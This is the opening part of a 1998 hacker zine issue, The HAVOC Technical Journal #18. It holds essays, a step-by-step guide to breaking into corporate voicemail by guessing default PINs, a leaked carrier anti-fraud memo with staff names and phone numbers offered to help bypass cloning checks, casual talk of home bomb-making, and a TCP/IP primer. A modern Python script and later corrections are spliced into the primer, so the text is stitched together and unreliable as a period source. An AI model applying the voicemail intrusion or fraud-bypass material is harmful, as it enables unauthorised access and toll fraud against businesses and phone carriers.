                      t h e   h a v o c
                t e c h n i c a l   j o u r n a l
                   volume 2, number 6, issue 18

[January 1, 1998..........................................Happy New Year]
[......................'Putting the hell back in shell'......................]

[Table of Contents...........................................................]

Contacts & Copyrights......................................Staff
Editorial..................................................scud_
The Way It Should Be.......................................shoelace
Bringing Back the Old School...............................Revelation
Hacking VMB Made Easy......................................SSS
Fraud Force System.........................................D-Day
An Introduction to the Internet Protocols..................scud_
Windows NT Vulnerability Theories Version 2................vacuum
Basic Network Architecture, Part II........................lurk3r
blast.c....................................................memor
sendmail885.c..............................................su1d
sendmail885.c (2)..........................................scud_
Scripting in UNIX..........................................Nartrof
ttyread.c and ttywrite.c...................................simon
The Mailroom...............................................scud_
The News...................................................KungFuFox
Reader Survey..............................................Staff

---->NEW Majordomo<----
Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp'

[Contacts & Copyrights..................................................Staff]

[1. Contacts]

Editor in Chief      : Scud-O, <scud@thtj.com>
Executive Editor     : KungFuFox
Submissions Editor   : Keystroke
Editing Assistants   : FH, Phrax
News Editor          : KungFuFox
Mail Editor          : Scud-O
Webpage Editor       : Scud-O

Extra Special Thanks : All the writers, and people who filled out the reader survey.
Shout Outs           : All of you in the know.

THTJ Website : http://www.thtj.com/
THTJ e-mail  : thtj@thtj.com, scud@thtj.com

[2. Copyrights]

The HAVOC Technical Journal (THTJ) Volume 2, Number 6, Issue 18, January 1st, 1998.

*Everything* here is (c) Copyright 1996, 1997, 1998 by THTJ, HAVOC Bell Systems Publishing, or HNS. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the Editor in Chief. The articles included here belong to their writers, and articles are copyrighted by their writers. If you want to use their articles in your publication, ask them.

For more information on our copyrights and article submissions policy, please see http://www.thtj.com/submissions.html
For more information on legal stuff go to http://www.thtj.com/legal.html

[No copying THTJ, damnit.]

Articles, comments, whatever should be directed to: scud@thtj.com
Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp'

Disclaimer: THTJ is provided free of charge, thus THTJ provides NO warranties whatsoever. You use this zine and its information at your own risk. While every effort has been taken to ensure the accuracy of the information contained in this article, the authors, editors, and contributors of this zine assume no responsibility for errors or omissions, or for damages resulting from the use of the information contained herein. The HAVOC Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities.

[Actually, to tell you the honest to goodness truth, we do endorse that stuff.
We just don't wanna get in trouble if you try it for yourself and something goes wrong.]

-------------------> 'It's Not Our Fault' <-------------------

THTJ is protected by the First Amendment of the US of A. If any of the information contained in this file offends you, then why the hell are you reading it? THTJ publishes its information to educate you; if YOU choose to use the information illegally, so be it. We are not responsible for *YOUR* actions. We merely provide the information. By reading this zine, you agree to this policy, and you void all rights to sue us or get us involved in the consequences of *YOUR* actions. If you cannot deal with this policy, then delete this file now.

Stealing articles, or pieces of articles, or pieces of pieces of articles from thtj without permission is a crime against humanity. If you want to use any of the material in here, please contact THTJ and/or the article's author. If you do not follow these rules, we may be forced to take legal action.

NOTICE: if you are a government official or employee reading this file, you MUST register with thtj. A registration permit will be mailed to you free of charge by using either of the mail addresses above. A registration fee of $50 is required upon submission of the permit. This will entitle you to receive thtj via a private mailing list, or via snail mail on a 3.5 floppy disk. UNTIL you are officially registered, you MUST DELETE ALL COPIES of thtj that you have, either in print or on a computer. You CANNOT read thtj until you are registered. This is *NOT* optional. If we detect .gov access from an unregistered person, we will have to take legal action.

[Editorial..............................................................scud_]

Ladies and gentlemen, boys and girls, feast your eyes on the new look of thtj. This will probably be the look we use for the next few issues, unless you mail us and say that you are going to kill us all because we aren't good at ASCII.
We are still going to be playing around with this format a bit, so your comments can help.

I would like to take some time out and address all of the reader surveys I have received. To the hundreds of you that replied, I thank you for your input, and I hope that the rest of you out there follow the lead of these people and fill out the survey. Those of you that did fill it out last month, feel free to fill out the form again and tell us how we are progressing.

A few of you that replied were sysadmins, and most of you said that you wish that hackers understood that most of these sysadmins are hackers just like you and me. This is an important point. Many sysadmins out there are a hundred times better at hacking than a lot of the hackers out there. Some sysadmins are not really hackers and they hate hackers, thus messing up the rep for all sysadmins.

A lot of you also asked if I was interested in articles. The answer is YES! thtj lives off of the articles that you all submit to us. If it wasn't for all of you out there that submit articles, thtj would have dried up a long time ago. So, please help keep this zine going by submitting articles to it. If you would like to submit an article, please send it to me at scud@thtj.com. I will look the article over, and will try to get back to you, but if I don't, then the article either will or will not be in the next issue of thtj.

Well, I must get back to the Festivus and the feats of strength, so I will not be able to write a real important editorial this month, but go on and read shoelace's bickerings below.

[The Way It Should Be, Dammit........................................shoelace]

Alas, yet another lame article by shoefunk (yes, that is also Shoelace). This one is about how stupid the world really is when it comes to computers, hacking, phreaking, bomb making, well, just about anything.
Recently, I was reading the 'Time Digital: Your Guide To Personal Technology', and came across a small dictionary page, where they defined a hacker as..

"HACKER: A good guy gone bad. In the early days of computing, the term was applied to enthusiastic, Jolt cola-swilling programmers who lacked formal training. Increasingly, though, hacker refers to a kind of high-tech, disgruntled postal employee--one who breaks into and crashes corporate and government databases for the sheer hell of it--and for a little recognition too."

Although this is in some cases true, I see more cases of people doing it to prove a point. Whether it's to prove that they can do something, or to let their opinion out about something, the common 'hacker' will do the 'hack' for probably more than just the sheer hell of it. You should always try to prove a point with what you do, even if the point isn't gonna happen. It gets out faster, and more people will find out about it.

Next subject; phreaking. I don't know about you people out there, but why is it that if you can set up a teleconference, that you are elite? I don't get it.. just because you can go down to a local pay-phone and dial up ATT Voice Conferencing, post the information, and talk to people, that you are really, really, really super. I'm not saying that a conf. isn't nice now and then, and that when someone sets it up, that you don't thank them, but why worship them? It's just a conf. Why not take apart your phone and see why it works instead of bribing someone that if they set one up, they will be rewarded? It's much more gratifying to go and see why something works, rather than to charge major cost to someone else. So go unscrew your phone and pry it open.

Also, what do people think making a pyrodex bomb is gonna do? Just because you have a lb. of pyrodex in your room, doesn't mean you're gonna blow up another Oklahoma Municipal Building type explosion. People should stop worrying about having fireworks and homemade explosions.
My friends and I make lots of bombs, and have yet to blow up buildings or anything. It's just something to do.

So enough of all the bitching about Hacking/Phreaking/Bombs.. just let whatever's gonna happen, happen. Let bombs go boom, PLEASE let phreaking become about understanding phones and why things happen, and for hacking, prove a point about why you do something. And for shoelace, shut up already.

-shoelace (shoe@beer.com)
 (http://www.public.usit.net/sltaylor)
-IRC: undernet - #terrorism, #deathmetal, #phreak

[Bringing Back the Old School......................................Revelation]

0000000000000000000000000000000000000||
0                                   0||
0   BRINGING BACK THE OLD SCHOOL II 0||
0                By                 0||
0            Revelation             0||
0            Hackers.Com            0||
0                                   0||
0000000000000000000000000000000000000||
 |||||||||||||||||||||||||||||||||||||

Many of you may have read my article "Bringing Back The Old School" in THTJ #12. It got a huge response and so I decided to write a followup on it, with more of my views and ideas on what the underground is becoming and what it should be. If you haven't read my previous article, I strongly suggest you do as a prelude to this.

The Internet was created to be a free place. A place where people can learn about anything and everything. Yet another tool that will change society for the better. But, there are always rebels. Rebels do as they please and refuse to abide by given rules that confine their hunger for knowledge. The Internet rebels gathered in a non-physical arena known as the underground. The underground is composed of hackers and phreaks and anyone with an interest in technology and the determination to learn as much as possible, regardless of the obstacles.

What is life about anyway? In my opinion, it's about learning. What else is there? There are material things that occupy most of our time, but what's it all for? Nothing. The only real thing is knowledge.
Someone with the determination to learn all they can regardless of the obstructions is a great asset to society in general. These are the people who create things that make life easier to live. These are the people who theorize and ponder about all that exists, simply because they want to. Knowledge is not a tangible thing, thus it cannot be taken away. There are many mediums used for the study and passing of knowledge; the computer is just one of them. Some people choose books, others television or radio, we choose the computer.

Hackers have gotten a distorted image for various reasons which I'm not going to go into, because what's done is done. Hackers originated as highly skilled computer programmers, and that eventually got distorted into computer criminals. Now, we are neither. What we are is information seekers. We just want to learn about all we can, because that's all that really matters in the long run. We want to learn about not only computers, but telephones, technology, government, the world in general, and life. We choose to pursue this knowledge by any means necessary, and on occasion, that may violate a law or two, but we hurt no one, we harm nothing. We are not criminals. As soon as the public understands that we will finally be taken for what we are: people wanting to learn.

Knowledge is taken for granted these days. The underground has lost its sense of ethics, the ethics of knowledge seeking and non-destruction that I described above. The underground has become polluted with software pirates, email bombers, carders, virus spreaders, and anarchists. We must pull away from those things that corrupt the underground now, or they will eventually corrupt us few who still believe in the true underground. These unethical, immoral, and just plain stupid things must be stopped. And stopping them is easy, but getting everyone to cooperate is not.
We can stop these things by simply refusing to distribute the files that teach these things, because if you stop the flow of the unethical information, people will turn to the ethical because it's all that's left. Simply refusing to link to sites that distribute these files will help too. So that's all you have to do to help me and Hackers.Com realize our idea of the New School, a return of the Old School ethics: simply deny the information that is corrupting the underground.

Now, some of you may be thinking: "He stated that all information should be free and that all hackers want is to pursue information, but then he stated that we need to stop the flow of information. This doesn't make sense." Well, actually, it does. I understand what you're thinking, but you must try to understand what I'm thinking. We choose to pursue pure knowledge for the simple gain of more knowledge, nothing else. We get no material gain from our desire to learn. But, those who pirate software, card, etc. are gaining finances and causing destruction at the same time. I want to stop the flow of information that does nothing but damage, because this is not the information which we want to pursue. We want to pursue the information that creates knowledge, not destroys or corrupts it. It is easier to destroy than to create, but creating is much more rewarding.

So this is it...this is a major step towards realizing our dream of freedom, greatness, and ethics among the underground population. Our determination to get rid of software pirates, carders, virus spreaders, and anarchists who do nothing but destroy, will overcome them...it's just a matter of time. I hope that the things I have discussed in this and my previous article are of some help to you in the underground and in life. Please study the things I have written, and think about them, and help me achieve the goal that I share with every other true hacker out there...bringing back the old school.
If you wish to further discuss these topics with me, or just comment on my article, you can do so by emailing me at: revelation@hackers.com

Or if you'd like more information on my ideas and my quest to bring back the Old School, you may visit my web site at: www.hackers.com

There you will find informational resources for the true hacker, and it will change your life forever. I will never give up...I hope the same is true for you.

Written By: Revelation
Hackers.Com
revelation@hackers.com
"Bringing Back The Old School"

[Hacking VMB Made Easy ...................................Super Sharp Shooter]
(mdma@cyberus.ca) (12/21/97)

Voice Mail Boxes (VMB) I would say are the best way to keep in touch, give info, or just say hi to someone other than email. But the fun thing with VMBs is that most of them are 1-800s and you can call them up or check them from any payphone (for free!) or ANYwhere in the world.

How do VMBs work?

VMBs are basically computer systems, with passwords, menus, users, with permissions, and so on. But it is all done by voice and DTMF tones. Just like computer systems, there are many different VMB systems out there, some stronger than others, some not. Think of an answering machine, but all digital and hundreds of them on a box.

First step is finding a VMB system; there are hundreds of 1-800 VMBs out there waiting to be hacked. Pick up a phone (a speaker phone works the best) and start hand-scanning, 1800-111-0001, 0002, 0003, and so on. You should only hand-scan after business hours. The best ones are small businesses; when you get to one (after hours) you should hear something like "Hello welcome <blah, blah blah> if you know your party's ID box number (or pid or ext.) you may dial it now." BINGO, you got one. Try out all the menus and get a feel for the system.

Ok, I found a VMB system, now what?
First you have to get to the VMB system (after all this is a computer not only running VMBs); most of the time it's '#' or '*' as soon as you hear the MAIN welcome message of the company. Next you have to know how long the box numbers are; you can find this out by going to the main menu and you should hear something like, "If you want to hear the directory of people (users) press #". Hit # and listen to the listings. Example: "John Doe box 546....Jonny Down box 538" and so on. Most systems have 3 digit long boxes, and the super-user usually places the users in groups like 2XX for marketing section, 6XX for accounting and so on, so listen and write down all the groups when listening to the directory list. If you hear that the 2xx group is active, listen to the last box number in the group and write it down. Most of the time sysadmins add extra boxes so they can add users to the group. The extra ones will be your target, why? Well it's easier to hack into, and when you get one it will take a lot longer for the sysadmins to find out that you hacked a box on the system.

The main goal is to find an EMPTY box. After you've found an empty box, the next step is the longest and you need luck. All VMB systems have default settings; for example when you set up a box (as the sysadmin) the passwd could be the same as the box number, ie: box 123, passwd 123. First you have to find the length of the passwd. You can do this by putting in the box number first, then it will ask you for the passwd (or pin number); first press the 1 button (doesn't have to be the one button) then wait a few secs, then 2..wait....then 3...wait, keep doing this until the lady says "Wrong Pin Number, please try again!" Just make sure you do it slow. Now that you know the passwd length here are some common defaults you should try first:

1) same box passwd   -=- box is 902 try 902 for passwd
2) reverse passwd    -=- box is 902 try 209 for passwd
3) add 1,2,3+ passwd -=- box is 902 try 9021 for passwd, 9022, 9023, etc.
4) Year passwd       -=- 1997, or 1998, whatever year we are in

More:

  _4 digit passwd_   _5 Digit Passwd_   _6 Digit Passwd_
        0000              00000              000000
        1111              11111              111111
        2222              22222              222222
        3333              33333              333333
        4444              44444              444444
        5555              55555              555555
        6666              66666              666666
        7777              77777              777777
        8888              88888              888888
        9999              99999              999999

And the list goes on and on.....just use your head. Try shit like 1234, 4321, and just look at your telephone keypad and look for patterns. Just don't give up.

I GOT ONE!! Now what?

Once you get into a box you will hear a number of menus. The first thing you should do is check to see if there are any new or saved messages on the box; if so, listen to them and pay attention to the date of the message. If you have found an empty box you don't have to worry about this, but if you hacked into someone's box this is important. If the dates on the messages are old (ie: 1+ months) then there is a good chance that your new box will not get killed, but if the messages are a few days (or hours) old then don't fuck with anything and try to hack a new box. If you screw with that box, like delete messages or change the passwd on the box, the owner will tell the sysadmin and you will lose it anyways, and then the sysadmin knows hackers are trying to break into the system.

Once you feel that the box you have is safe, it's up to you what to do. Change the voice greeting message, passwd; some VMB systems have wake up calls, which is wicked, think about it, you can put ANYONE's phone number in and time (ie: 4:00am) in North America to wake them up, or piss them off. Just look around on each menu to get a feel for it. Most of the time sysadmins are box number 999, 998. So if you're lucky and can hack a sysadmin box you can make new groups, new boxes for all your friends. If you do hack the sysadmin box just make a few boxes and leave; don't change the sysadmin's passwd or delete any messages.

Play Safe, and Have Phun.
Super Sharp Shooter -+- 1.800.234.1136 BOX 999
"Phreaking For Phun"
http://www.cyberus.ca/~mdma/phreak
NPA 613

[Fraud Force System.....................................................D-Day]

Century Cellunet's New "Fraud Force System"
Technical Interoffice Data

People in the Baton Rouge, New Orleans, Louisiana and surrounding towns may find some use in the following file. It documents the structure of the "Fraud Force" System being implemented into these locations' cell sites and switches. It is unknown if it will affect landline systems, but from the way it works, it is doubtful.

EOC---------------------------------------------------------------------EOC

Interoffice Memorandum

Date: February 18, 1997
File: FRAUDFOR
To: Div/Dist Managers
    Office Managers
    Chris Nolen
    Barry Gugliuzza
FROM: Phyllis May
SUBJECT: Fraud Force Use In Fraud Markets

Laura Graham developed the following procedure for the Customer Service Center to be used when customers are using the phones in high fraud markets where Fraud Force has been implemented. The following details are unique to Region 1 and the Force implementation. Fraud Force will start with the Baton Rouge system the week ending Feb 28. Other markets will be added as needed. All Louisiana, Arkansas and Texarkana cellulars in this system will be routed through Fraud Force. Calls will be routed to Customer Service. Please direct any questions to Jim Burnham at 318/683-3429 or Rhonda Woodard at 318/683-3427.

(page 2)

Overview:

Purpose: FraudForce is a system implemented by Century, to help combat cloning fraud for our customers roaming in high fraud areas. Affected markets will be included as needed, those which are found to have high fraud rates.

(page 3)

Following is an overview of the verification process for Century customers using cell service for the first time in a FF market. For detailed instructions, see "Verification Process".

Step | Action
1. Customer places first call to any number.
2. Call is routed (hotlined) to FraudForce, where an Interactive Voice Response (IVR) prompts the user to enter their 10 digit cell number, which is verified ending with the pound key. The customer has three (3) tries to enter their number correctly.
3. Call is transferred to Century Cellunet's customer service center.
   - Valid customers will continue to step 4
   - Invalid customers are instructed to make another call and re-enter the correct cell number.
4. The customer information is verified to confirm the cell user is valid.

   |If Information Is        | The CSR                                  |
   |-------------------------|------------------------------------------|
   | verified,               | explains the call credit and procedure   |
   |                         | to establish PIN. Go to step 5           |
   |-------------------------|------------------------------------------|
   | not verified,           | presses 0 on their keypad to transfer to |
   |                         | a recording explaining the caller is     |
   |                         | denied.                                  |
   |_________________________|__________________________________________|

5. The CSR presses 1 to transfer the call to the FraudForce IVR, and the customer interactively uses their phone keypad to establish a 4 digit PIN.
6. If a billed call, the CSR notes the length of the call and credits the customer's account (length of call X roaming airtime rate) to AFDFC. This is because the customer incurred airtime charges during verification and PIN selection.

(page 3)

ESTABLISHING AND USING A PIN

Hours accessible: Any normal working hours. Customers after hours will be directed to call during normal hours.

Call types: There are two types of FraudForce calls.

Fraud Force 1   These are calls where the customer entered a valid 10
-------------   digit cell number when prompted after the initial hotline.
                There are customers who had previously established a PIN,
                however entered it incorrectly and must repeat the
                verification process, or are making their first call in the
                FraudForce market verifying for the first time.
Fraud Force 3   These are calls where the customer entered an invalid 10
-------------   digit cell number or pressed zero (0) for assistance (the
                customer has three tries to enter their cell # correctly).
                The customer cannot be verified without entering a valid 10
                digit number. They are instructed to attempt the call again,
                so they receive the IVR prompts to enter the 10 digit number
                correctly.

PIN DETAILS:

The PIN is four digits and should not start with zero. The PIN is not accessible to Century. The customer must remember their PIN. Once established, the PIN is valid in that market until Century removes it and the customer calls the IVR to establish a new one. This can be done if the user forgets their PIN or if the usage/user appears to be fraudulent and Century needs to block service.

A PIN must be established in each FraudForce market. The same PIN may be used in every FraudForce market, or different PINs may be used. Different customers MAY have the same PIN.

The customer will periodically be asked to enter the PIN before making a call. A user has 3 tries to enter the PIN correctly. On the 4th try, the call will be directed to Fraud Force 1.

(page 4)

VERIFICATION PROCEDURES

The following are the procedures for a FraudForce 1 call.

1. Customer first places call to any number.
2. Caller is hotlined to FraudForce, where an IVR prompts the user to enter their 10 digit cell phone number and the pound key.
3. When entered correctly, the call is transferred to Century's customer service center, with the following introduction: "Please verify your 10 digit cellular number. Press any key to accept this call."
4. The CSR presses any key on their phone to accept the call and says to the caller: Century Cellunet, This is (name). You are currently roaming in a high cellular fraud area. For your protection and ours, will you verify some account information to enable you to establish a Personal Identification Number, or PIN.
5. Important: Customer information must be verified to confirm the account holder, secondary authorization holders, or business account cellular users are valid before being given access to establishing a PIN.

   Individual Accounts:
     What city are you currently in?
     What is your mobile number?
     What is your name?
     If user differs from account name, What is the name on the account?
     What is your Social Security Number?
     If the Social Security number is not verified, verify one of the following:
       What is the account's billing address?
       What is your home phone number?
       What is your work number?

   Business Accounts:
     What city are you currently in?
     What is your mobile number?
     What is your name?
     What is the account name?
     What is the account's billing address?
     The general billing address is okay; if not verified at all (customer does not know) verify the following:
       What is your work phone number?

(page 5)

   If information is verified: Thank you for your cooperation. If a billed call - You will receive credit for this call. If a free call - This is a free call. I am now returning you to the system so you can set up your PIN. The CSR presses 1 on their keypad to transfer to the FraudForce IVR to establish their PIN.

   If information is NOT verified: I am unable to authorize the information you have given; and presses 0 on their keypad to transfer the call to a recording explaining the call is denied. (no, don't give out account information)

7. The CSR tickles the customer's account using an action code of PENDF. Include the 1- digit cellular number, FF, whether or not the customer was verified.

(page 6) (End of Memo)

I would have typed the rest of this file, but it's just basically a list of customers' questions and alternate places for the caller to be transferred. Nothing you pretty much need to know about the system, but if you keep a copy of this on hand, you may be able to bypass. You have what the operator is looking at; you know what she's going to do. Use this information, don't flaunt it.
Century is a good corporation, but sometimes you need a cell! Remember, if updates to this file are made, I will be sure to send them out to the public.

UPDATE: I have just discovered that FraudForce is now being implemented in almost all cities around the country that use Century. Now this is a serious problem.

[An Introduction to the Internet Protocols..............................scud_]

It seems that everyone is covering this topic for an article, so I figured that it was high time that I toss my hat into the ring and muck things up a bit more. This is merely an introduction, so I am not going to go into the formats for TCP and UDP headers and packets, well at least not in this version of this document. TCP/IP and all of the other Internet protocols take up whole books (and volumes of books) to fully explain. If you want to learn more, check out the local B&N or Borders, and pick up a book on TCP/IP.

[ Editor's Note: The deadline for this issue came up too fast, so I was unable to finish this whole text. There is still a good intro to TCP and UDP, so read it, and next month I will hopefully complete this Introduction with the rest of the gang of Internet Protocols.]

The Internet is the world's busiest and the only true worldwide network for all types of computers and people to use. What follows is an Introduction to the protocols that make the Internet work.

There are a wide range of protocols that the Internet uses to connect to other computers all over the world. However, since the Internet was started on UNIX, the UNIX standards of networking are what the Internet mainly uses to connect computers together. The UNIX protocols are often referred to as TCP/IP, for Transmission Control Protocol/Internet Protocol. This is really in two parts: TCP is an upper layer for data transport, and IP is a lower level network layer, but more on this in a bit.
Although several other methods are used for other services, TCP/IP is the most commonly used protocol grouping, so we will cover TCP/IP first. Before we delve into TCP/IP, we must first understand the model that the Internet's protocols are developed on. Welcome to OSI.

-──-────────────────────────────────────────────────────────────────────────
 OSI - The Open Systems Interconnect Reference Model
-──-────────────────────────────────────────────────────────────────────────

The Open Systems Interconnect (OSI) Reference Model was part of a project by the International Organization for Standardization (ISO). The ISO OSI network protocol architecture scheme never really caught on, but the TCP/IP protocol uses the basic groundwork that OSI started. The model consists of 7 layers, with each layer building on the layers below it, and providing specific functionality. Each layer has its own unique characteristics, and as a whole, the OSI model enables network communication. The software implementation of such a layered model is appropriately termed a protocol stack. User applications insert information into one layer and each layer specially encapsulates the data until the bottom layer has been reached, and this physical layer moves the data down the line to its destination, occasionally having the layers translated from the bottom up as the data is transported.

The OSI Model looks like below:

        ┌───────────────────────┐
        │ 7. Application Layer  │
        ├───────────────────────┤
        │ 6. Presentation Layer │
        ├───────────────────────┤
        │ 5. Session Layer      │
        ├───────────────────────┤
        │ 4. Transport Layer    │
        ├───────────────────────┤
        │ 3. Network Layer      │
        ├───────────────────────┤
        │ 2. Data Link Layer    │
        ├───────────────────────┤
        │ 1. Physical Layer     │
        └───────────────────────┘

The layers have specific roles as I have said, each refraining from intruding into the domains of the other layers. The units exchanged are the units of information that are passed in that layer.
o Application Layer: Contains the network applications with which people interact, such as mail, ftp, rlogin, etc.
  Units exchanged: message

o Presentation Layer: Creates common data structures (how data is represented on the wire).
  Units exchanged: message

o Session Layer: Manages connections (dialogs) between network applications.
  Units exchanged: message

o Transport Layer: Ensures that data is received exactly as it was sent (for a reliable transport such as TCP; an unreliable transport such as UDP does not promise this).
  Units exchanged: segment (TCP) or datagram (UDP)

o Network Layer: Routes data through various physical networks while traveling to a known host.
  Units exchanged: packets

o Data Link Layer: Transmits and receives frames across a single physical network, with error detection on each frame.
  Units exchanged: frames

o Physical Layer: Defines the physical properties of the network, such as voltage levels, cable types, interface pins and other such fun things.
  Units exchanged: bits

-──-───────────────────────────────────────────────────────────────────────────
The TCP/IP Network Model
-──-───────────────────────────────────────────────────────────────────────────

The OSI model informs an understanding of the TCP/IP communication architecture. When TCP/IP is viewed as a layered model, there are usually 4 layers that are seen to compose it:

o Application
o Transport
o Network
o Link

As with OSI, each TCP/IP layer has its own unique job:

Application Layer: Network applications depend on the definition of a clear dialog. In a client-server system, the client application knows how to request something, and the server knows how to respond to that request. Examples of this include FTP, HTTP, etc.

Transport Layer: The transport layer allows network applications to exchange messages over clearly defined channels with specific characteristics. The two protocols within the TCP/IP suite that implement this layer are TCP (Transmission Control Protocol) and UDP (User Datagram Protocol).
Network Layer: The network layer allows information to be transmitted to any machine on the contiguous TCP/IP network, regardless of the different physical networks that intervene. The Internet Protocol (IP) is the common mechanism for transmitting data within this layer.

Link Layer: The link layer consists of the low level protocols used to transmit data to machines on the same physical network. Protocols that are not part of the TCP/IP suite, such as Ethernet, Token Ring, FDDI, ATM, etc., implement this layer.

A 2 system TCP/IP connection would look something like this:

   System 1 (client)                                    System 2 (server)
   ┌─────────────┐                                      ┌─────────────┐
   │ Application │                                      │ Application │
   └─────────────┘                                      └─────────────┘
   ┌─────────────┐                                      ┌─────────────┐
   │  Transport  │                                      │  Transport  │
   └─────────────┘                                      └─────────────┘
   ┌─────────────┐                                      ┌─────────────┐
   │   Network   │                                      │   Network   │
   └─────────────┘                                      └─────────────┘
   ┌─────────────┐               Physical               ┌─────────────┐
   │  Data Link  │<------------------------------------>│  Data Link  │
   └─────────────┘               Network                └─────────────┘

Only the data link layers are physically connected; each upper layer talks to its peer on the other system through the layers below it.

Data within these layers is encapsulated with a common mechanism: each protocol has a header, carrying meta-information such as the source, the destination and other important attributes, and a data portion that contains the actual information. The protocol data units from the upper layers are carried within the data portion of the lower ones. When traveling back up the protocol stack on the receiving side, each layer strips its own header and delivers the remaining data to the layer above, so the information is reconstructed as it is delivered to each layer.
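The encapsulation just described, worked through in code. This is an added example rather than anything from the article: it builds the Ethernet/IP/UDP/TFTP frame whose byte counts the text works out a little further down, computing the IP header checksum the way a real stack does, and shows the receiver-side check that a header with a valid checksum sums to zero. The MAC and IP addresses, ports and payload are made up for the demonstration.

```python
"""Encapsulate a 200-byte TFTP DATA block in UDP, IP and Ethernet, top-down,
the way the text describes.  Added example; addresses and ports are made up."""
import struct

ETH_HDR, IP_HDR, UDP_HDR, TFTP_HDR = 14, 20, 8, 4
ETHERTYPE_IP, IPPROTO_UDP, TFTP_OP_DATA = 0x0800, 17, 3


def checksum16(data: bytes) -> int:
    """RFC 1071 one's-complement checksum, as used for the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ip_bytes(dotted: str) -> bytes:
    """'168.143.27.120' -> the 4 network-order bytes of the 32-bit address."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError("bad IPv4 address: %r" % dotted)
    return bytes(octets)


def build_tftp_frame(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port,
                     block, data, ttl=64, ident=0x1A08):
    """Return (frame, per-layer sizes).  The frame is what software hands to
    the NIC; the 4-byte Ethernet trailer (FCS) is added by the card itself."""
    tftp = struct.pack("!HH", TFTP_OP_DATA, block) + data   # TFTP: opcode, block#, data
    udp_len = UDP_HDR + len(tftp)
    # UDP checksum field 0 means "not computed": the checksum is optional in IPv4 UDP.
    udp = struct.pack("!HHHH", src_port, dst_port, udp_len, 0) + tftp
    total_len = IP_HDR + udp_len
    ver_ihl, tos, flags_frag = 0x45, 0, 0x4000             # IPv4, 20-byte header, DF set
    ip_hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, tos, total_len, ident,
                         flags_frag, ttl, IPPROTO_UDP, 0,
                         ip_bytes(src_ip), ip_bytes(dst_ip))
    csum = checksum16(ip_hdr)                               # computed with the field zeroed
    ip_hdr = ip_hdr[:10] + struct.pack("!H", csum) + ip_hdr[12:]
    eth_hdr = dst_mac + src_mac + struct.pack("!H", ETHERTYPE_IP)
    sizes = {"ethernet": ETH_HDR, "ip": IP_HDR, "udp": UDP_HDR,
             "tftp": TFTP_HDR, "data": len(data)}
    return eth_hdr + ip_hdr + udp, sizes


def ip_header_ok(frame: bytes) -> bool:
    """Receiver-side check: a valid IPv4 header, checksum included, sums to 0."""
    ihl = (frame[ETH_HDR] & 0x0F) * 4
    return checksum16(frame[ETH_HDR:ETH_HDR + ihl]) == 0


if __name__ == "__main__":
    # Constructed addresses (locally administered MACs) and a 200-byte payload.
    frame, sizes = build_tftp_frame(
        bytes.fromhex("020000000001"), bytes.fromhex("020000000002"),
        "168.143.27.120", "168.143.27.1", 1234, 69, 1, b"A" * 200)
    print(sizes, "bytes handed to the NIC:", len(frame), "+ 4 FCS =", len(frame) + 4)
    print("IP header checksum valid:", ip_header_ok(frame))
```

The sizes come out to 14 + 20 + 8 + 4 + 200 = 246 bytes, plus the 4-byte trailer the card appends, which is the 250-byte figure in the text.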
   Application Layer:  ┌────────┬──────────┐
                       │ Header │   Data   │
                       └────────┴──────────┘

   Transport Layer:    ┌────────┬─────────────────────┐
                       │ Header │        Data         │
                       └────────┴─────────────────────┘

   Network Layer:      ┌────────┬────────────────────────────────┐
                       │ Header │              Data              │
                       └────────┴────────────────────────────────┘

   Link Layer:         ┌────────┬───────────────────────────────────────────┐
                       │ Header │                   Data                    │
                       └────────┴───────────────────────────────────────────┘

For example, a 200 byte TFTP data packet using UDP/IP over Ethernet might look a little something like:

   ┌──────────┬──────────┬──────────┬──────────┬──────────────┬──────────┐
   │ Ethernet │    IP    │   UDP    │   TFTP   │     Data     │ Ethernet │
   │  Header  │  Header  │  Header  │  Header  │              │ Trailer  │
   └──────────┴──────────┴──────────┴──────────┴──────────────┴──────────┘
   (bytes)  14         20         8          4          200        4

This adds up to a total Ethernet frame size of 250 bytes. (The Ethernet header is 14 bytes and the IP header 20, not the other way round. The 4 byte trailer is the Ethernet frame check sequence, which the network card adds on transmit and strips on receive, so what software sees is a 246 byte frame.)

-──-───────────────────────────────────────────────────────────────────────────
The TCP/IP Protocols: The Internet Protocol (IP)
-──-───────────────────────────────────────────────────────────────────────────

IP is the cornerstone of the TCP/IP suite. Every piece of data on the Internet travels in IP packets, the basic unit of IP transmission. IP is termed a connectionless, unreliable protocol. It is connectionless because IP does not exchange any control information before transmitting data to a remote system; the packets are merely sent toward the destination with the expectation that they will be treated properly. It is unreliable because it does not retransmit lost packets and does not detect corrupted data (the IP checksum covers only the IP header, not the payload). IP depends upon the upper level protocols, such as TCP or UDP, to do this.

IP defines a universal addressing scheme called IP addresses. An IP address is a 32-bit number, and each standard address is unique on the Internet. Given an IP packet, the information can be routed to the destination based upon the IP address defined in the packet header. IP addresses are generally written as four numbers between 0 and 255 separated by periods (e.g.
168.143.27.120).

While a 32-bit number is an appropriate way for computers to address systems, humans understandably have difficulty remembering them. Thus the Domain Name System (DNS) was developed to map domain names to their corresponding IP addresses, and vice versa. So mulder.clark.net is the same thing as 168.143.27.120, and 168.143.27.120 is the same thing as mulder.clark.net. It is very important to realize that these domain names are not used or understood by IP at all. When an application wants to transmit data to another machine, it must first translate the domain name to an IP address using DNS. The receiving application sees only the IP address; if it wants a name, it has to ask DNS for the reverse mapping of that address, and a name obtained that way comes from whoever controls the reverse zone, so it must never be taken on its own as proof of who the peer is. There is not a one-to-one correspondence between IP addresses and domain names: a domain name can map to multiple IP addresses, and multiple domain names can map to the same IP address.

-──-───────────────────────────────────────────────────────────────────────────
The TCP/IP Protocols: The Transmission Control Protocol (TCP)
-──-───────────────────────────────────────────────────────────────────────────

